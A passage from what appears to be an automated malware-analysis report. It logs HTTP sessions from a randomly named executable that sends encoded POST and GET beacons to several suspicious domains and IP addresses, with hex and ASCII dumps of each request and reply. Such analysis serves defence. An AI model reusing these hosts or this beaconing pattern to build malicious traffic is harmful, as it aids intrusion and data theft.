                                              Data Ascii: k06T=nMi0BGwqXNIAbEbTLOVzP5faLalg0goN8ex3q7lTYHTPPRpcHZghsISVg7cJyWdCxUUidpN/Gyb9mRtWeGeqtoS5f0bFHe9MhoPkRcEc4eNL+gPlumqs+rsxuFGr79CiNFbidqt385nEAWYXBD3v7UeiL5DEivrj81FefC+3nWarNI1HJsnXnHgC7zyrb3dxBm8IK5/bSfLn/H/J5fYh70lnf8hiD+ZSAhkq2/7Oe8ANBuJMLWoIkteobm+cdO9WnzogEKLALDmFsELs913BeFJpiuvlE+CqcQOY2et+dPFORcSYW6YzJMwnYV52Duwuxf1dTeEhkblR6YrCpbAJ5IkVxnA1IwW9Sc1n/40AgoEGPJjU+Jzp79ACPY1MyQwEd5K69EpyU7z07CJHkFwK8EvhlgQ+/jOqz/RuC+2yhx1LjTjerH47UzVm4PUnD+6m/yrj9BTLZZF5vLdmPTvv2pWMT6Y1osteixxCgteWWobY5VPSAA8/JxJpkRzWcCaVTgyatdwScmy+01G3fBHbLmxjoNgjeK0SCXXiTz4g4V+Ch1xmd4VobhxQ3tDHOTrZiaQLALblWAeYec310Iyr0H6U20SkJgNemsWJhU6NBOzORJQ766/PlgJqmpILpC/oWLCW1yO2FzGypbgyafSV5OfQnY3cyOC8ACfqKn6Irwgz2BZRLEwB4GwofBUU7e1c26gaDjcPp2gZgMQfZHHmnhZ8l+t9Wf8TA2BtIIoDh2w1hq4dOeOY6TIsjJGeSB0a7stPT74MZClh3g9h648J06mx/RF93FxeYebbuFZH9y3LFZNh1H7jaD6ijjHsU8AhAvf0W0usdHRzyByBqquxonv9oyDQNOBk+RK1dfvk9TSqjFS/v/+myjz4A8ykJAajTIpHw6lzO3wGw47S/9VpJyEY5parAelUeLuJYJIBl5t70FSvFVH13DtG688sZOS5/B+9/9/udBSLmbQ6BppoNnLw7UKpQOcVlVQbu9mgXhGxaTX [TRUNCATED]
                                              Jul 3, 2024 16:41:02.849128962 CEST533INHTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:41:02 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.549729203.161.55.102805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:04.762644053 CEST544OUTGET /tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.lacemalt.top
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:41:05.396370888 CEST548INHTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:41:05 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.549730108.179.193.98805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:10.750220060 CEST823OUTPOST /xti2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.siteblogoficialon.com
                                              Origin: http://www.siteblogoficialon.com
                                              Referer: http://www.siteblogoficialon.com/xti2/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 45 63 63 58 58 55 52 4e 53 4f 70 57 46 47 59 36 44 6a 34 4b 72 33 6b 6d 4e 71 64 74 73 64 47 52 61 71 78 72 4c 52 76 52 4a 68 38 69 57 50 72 7a 72 39 72 48 48 4e 32 61 37 4b 65 56 47 34 47 4e 38 4a 61 46 49 4e 38 78 32 36 2b 47 52 44 37 49 6a 34 68 4d 74 4d 48 4c 5a 77 4b 5a 69 77 54 67 2b 55 46 43 2b 6d 4a 2f 67 33 70 6e 42 2b 61 54 76 6b 30 63 35 4f 6d 49 71 43 4b 46 59 47 69 2b 39 50 35 47 50 2b 33 4a 6f 6f 4c 63 36 34 62 43 63 79 6d 73 74 33 32 78 43 52 42 7a 43 67 79 30 59 55 48 6e 35 47 2b 31 46 6b 46 35 33 6f 70 55 49 57 55 59 75 2b 4b 53 37 38 3d
                                              Data Ascii: k06T=dDbd7FI+aBuIqEccXXURNSOpWFGY6Dj4Kr3kmNqdtsdGRaqxrLRvRJh8iWPrzr9rHHN2a7KeVG4GN8JaFIN8x26+GRD7Ij4hMtMHLZwKZiwTg+UFC+mJ/g3pnB+aTvk0c5OmIqCKFYGi+9P5GP+3JooLc64bCcymst32xCRBzCgy0YUHn5G+1FkF53opUIWUYu+KS78=
                                              Jul 3, 2024 16:41:11.412092924 CEST361INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:11 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.549731108.179.193.98805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:13.298605919 CEST843OUTPOST /xti2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.siteblogoficialon.com
                                              Origin: http://www.siteblogoficialon.com
                                              Referer: http://www.siteblogoficialon.com/xti2/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 6c 73 63 55 30 4d 52 4c 79 4f 75 5a 6c 47 59 77 6a 69 2f 4b 72 37 6b 6d 4d 75 4e 74 61 6c 47 53 2b 6d 78 71 4a 35 76 43 35 68 38 77 32 50 75 35 4c 39 67 48 48 4a 2b 61 2b 71 65 56 47 73 47 4e 2b 52 61 46 37 56 2f 77 6d 36 34 53 68 44 35 48 44 34 68 4d 74 4d 48 4c 61 4d 67 5a 69 34 54 67 4f 6b 46 44 61 4b 4b 68 51 33 71 33 52 2b 61 58 76 6b 77 63 35 50 7a 49 72 66 43 46 61 2b 69 2b 39 2f 35 48 65 2b 30 65 59 6f 4e 57 61 35 30 47 4f 58 6f 6d 66 2f 2f 75 30 52 41 73 54 6b 39 31 75 35 74 39 62 4f 57 6d 6c 49 39 70 6b 67 65 46 34 33 39 43 4e 75 36 4d 73 70 41 34 59 62 42 6d 32 45 74 2f 64 64 63 49 48 70 79 39 6e 74 65
                                              Data Ascii: k06T=dDbd7FI+aBuIqlscU0MRLyOuZlGYwji/Kr7kmMuNtalGS+mxqJ5vC5h8w2Pu5L9gHHJ+a+qeVGsGN+RaF7V/wm64ShD5HD4hMtMHLaMgZi4TgOkFDaKKhQ3q3R+aXvkwc5PzIrfCFa+i+9/5He+0eYoNWa50GOXomf//u0RAsTk91u5t9bOWmlI9pkgeF439CNu6MspA4YbBm2Et/ddcIHpy9nte
                                              Jul 3, 2024 16:41:13.938481092 CEST361INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:13 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.549732108.179.193.98805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:15.828269958 CEST1860OUTPOST /xti2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.siteblogoficialon.com
                                              Origin: http://www.siteblogoficialon.com
                                              Referer: http://www.siteblogoficialon.com/xti2/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 64 44 62 64 37 46 49 2b 61 42 75 49 71 6c 73 63 55 30 4d 52 4c 79 4f 75 5a 6c 47 59 77 6a 69 2f 4b 72 37 6b 6d 4d 75 4e 74 61 74 47 52 4c 36 78 72 75 6c 76 42 35 68 38 7a 32 50 76 35 4c 39 39 48 48 78 36 61 2b 75 4f 56 46 55 47 4f 62 46 61 48 4b 56 2f 35 6d 36 34 51 68 44 34 49 6a 35 70 4d 72 73 62 4c 5a 30 67 5a 69 34 54 67 49 41 46 4b 75 6d 4b 6a 51 33 70 6e 42 2b 6f 54 76 6b 59 63 39 61 45 49 72 71 67 46 70 32 69 2b 5a 62 35 4c 49 71 30 43 49 6f 50 56 61 35 73 47 4f 72 6a 6d 62 6e 5a 75 30 4d 6e 73 55 6f 39 33 59 30 71 6d 75 75 73 6b 47 42 52 6d 6e 6b 70 64 39 4c 6c 4e 2f 32 7a 41 64 4a 62 31 61 33 4b 76 32 45 6f 30 4d 55 73 55 54 70 61 77 79 52 52 4e 59 62 4c 69 4b 4e 67 35 51 41 62 6f 31 43 5a 38 62 58 54 68 57 4a 36 4f 54 37 56 6b 41 6b 70 30 63 4e 43 6d 50 69 30 57 4c 70 2b 4c 43 4d 52 42 2f 52 6b 4e 49 48 6a 6e 62 2b 4d 45 50 30 74 66 34 30 4b 36 53 33 5a 4a 69 44 49 4f 69 53 74 4b 48 6b 56 37 66 46 49 37 76 4b 36 7a 2b 48 31 35 33 4c 44 6c 4b 55 77 39 53 44 5a 32 55 72 55 59 [TRUNCATED]
                                              Data Ascii: k06T=dDbd7FI+aBuIqlscU0MRLyOuZlGYwji/Kr7kmMuNtatGRL6xrulvB5h8z2Pv5L99HHx6a+uOVFUGObFaHKV/5m64QhD4Ij5pMrsbLZ0gZi4TgIAFKumKjQ3pnB+oTvkYc9aEIrqgFp2i+Zb5LIq0CIoPVa5sGOrjmbnZu0MnsUo93Y0qmuuskGBRmnkpd9LlN/2zAdJb1a3Kv2Eo0MUsUTpawyRRNYbLiKNg5QAbo1CZ8bXThWJ6OT7VkAkp0cNCmPi0WLp+LCMRB/RkNIHjnb+MEP0tf40K6S3ZJiDIOiStKHkV7fFI7vK6z+H153LDlKUw9SDZ2UrUY47XxhshADmT6/Jt1OiT6eacGktSEq0IS9hkckxwM5xSLspJcggFxxYtJWO2xD0+YLDXLM2EzehOqLIrC5x3ELe4SX2O6ATW0md1NEG28VTB04VIHXvK2igqXKCRjRw+/GSlMFQdexjnA68gY6dH/spAsKbiBtUI1+kL2WbtxOOcKc0ILGbUy4jZ/lHS6sOqrppK6VRe/T9J906Wo2Yk1lE911EiK2Eb2WJYajLtpUYPynbou3QOGCdUb9oiEIooV3ex4KFJqw3jdRFzjAz/CXqISzFFDntJ+E6s5OtFlJ0ZWMEyHi2rxKqTWXCOzjrv7fOOO4xEqqiXhdvdTR3hTnerhsP1RRwupHOB2pCDN35PdkizelYA4TGq1GHGurMPRr3lOlTkSzhJOOJRdDPlwqZqCxO2mqeRezvxFTPcfhCA7XXXxhj2ye/MpaoqDOkLr/YXqcka2JTnOPiRJHiuVBy6xiNM/X6cTVlfZJdEV6Pb+Xf04W+83RaMVDSdddYY5C3njqjx1i3jG2c8pu35Ec7q9mh3jTh6mkzk1v8l5u2fDVwBqRLFpC5rxKgifzA32S7PEwUKw2JM6dKZnUbKFpNVLl8yaYLHQBZ+gC7I43HRMj98rsSFg7REqL6XRy9+2l5kOTx9TN9sVlEXM8xq0Z1+aWsNbJgpumH [TRUNCATED]
                                              Jul 3, 2024 16:41:16.468796968 CEST361INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:16 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.549733108.179.193.98805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:18.356312990 CEST553OUTGET /xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.siteblogoficialon.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:41:19.225675106 CEST519INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:18 GMT
                                              Server: Apache
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Location: https://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp
                                              Content-Length: 0
                                              Content-Type: text/html; charset=UTF-8


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.54973435.241.34.216805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:40.894341946 CEST790OUTPOST /7npk/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mg55aa.xyz
                                              Origin: http://www.mg55aa.xyz
                                              Referer: http://www.mg55aa.xyz/7npk/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 32 6c 63 31 37 7a 79 50 34 55 5a 66 67 68 59 64 56 38 51 4c 45 54 61 71 65 35 67 48 61 51 4b 52 54 6d 73 76 37 5a 35 32 38 6f 31 39 33 67 4a 53 43 45 56 6d 6b 6f 4c 5a 2f 77 68 55 41 32 49 65 6a 6c 42 61 35 70 49 69 46 59 7a 62 68 45 42 2f 35 72 53 66 51 67 44 4f 5a 56 6c 66 68 35 6f 39 69 6e 42 45 77 4e 30 38 30 7a 6e 52 6e 45 4e 53 69 52 45 59 78 77 30 52 53 6f 5a 59 51 41 6f 36 42 43 74 58 45 2f 59 38 4d 43 47 4c 69 6c 70 42 56 74 38 6e 6b 6e 69 4e 45 73 37 4f 6b 6e 32 4b 4b 44 69 39 38 53 6a 46 5a 4b 67 48 53 2b 72 6b 53 62 57 64 4e 44 43 66 76 32 6b 3d
                                              Data Ascii: k06T=6nJFBUn9Ne3O2lc17zyP4UZfghYdV8QLETaqe5gHaQKRTmsv7Z528o193gJSCEVmkoLZ/whUA2IejlBa5pIiFYzbhEB/5rSfQgDOZVlfh5o9inBEwN080znRnENSiREYxw0RSoZYQAo6BCtXE/Y8MCGLilpBVt8nkniNEs7Okn2KKDi98SjFZKgHS+rkSbWdNDCfv2k=
                                              Jul 3, 2024 16:41:41.533133030 CEST176INHTTP/1.1 405 Method Not Allowed
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Via: 1.1 google
                                              Connection: close
                                              Jul 3, 2024 16:41:41.535643101 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.54973535.241.34.216805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:43.452306032 CEST810OUTPOST /7npk/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mg55aa.xyz
                                              Origin: http://www.mg55aa.xyz
                                              Referer: http://www.mg55aa.xyz/7npk/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 33 46 4d 31 35 55 75 50 36 30 5a 63 6c 68 59 64 50 4d 51 50 45 54 65 71 65 38 5a 59 5a 69 2b 52 55 43 6f 76 36 59 35 32 39 6f 31 39 39 41 4a 74 66 55 56 39 6b 6f 58 72 2f 30 68 55 41 32 63 65 6a 67 39 61 35 61 77 68 45 49 7a 56 36 55 42 35 6b 37 53 66 51 67 44 4f 5a 56 78 35 68 34 41 39 6a 58 52 45 33 5a 41 2f 2b 54 6e 4f 75 6b 4e 53 6d 52 45 63 78 77 30 76 53 70 46 32 51 43 67 36 42 48 52 58 45 72 30 6a 47 43 47 4e 2f 31 6f 41 51 74 70 52 70 46 71 36 50 61 75 58 78 46 71 2f 43 56 50 58 6d 77 72 74 4b 71 4d 2f 43 74 6a 54 44 72 33 30 58 67 53 76 78 68 7a 44 79 74 75 56 59 73 55 50 48 61 45 52 56 6f 72 62 71 59 59 6f
                                              Data Ascii: k06T=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZi+RUCov6Y529o199AJtfUV9koXr/0hUA2cejg9a5awhEIzV6UB5k7SfQgDOZVx5h4A9jXRE3ZA/+TnOukNSmREcxw0vSpF2QCg6BHRXEr0jGCGN/1oAQtpRpFq6PauXxFq/CVPXmwrtKqM/CtjTDr30XgSvxhzDytuVYsUPHaERVorbqYYo
                                              Jul 3, 2024 16:41:44.097403049 CEST176INHTTP/1.1 405 Method Not Allowed
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:43 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Via: 1.1 google
                                              Connection: close
                                              Jul 3, 2024 16:41:44.099843979 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.54973635.241.34.216805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:45.986387014 CEST1827OUTPOST /7npk/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mg55aa.xyz
                                              Origin: http://www.mg55aa.xyz
                                              Referer: http://www.mg55aa.xyz/7npk/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
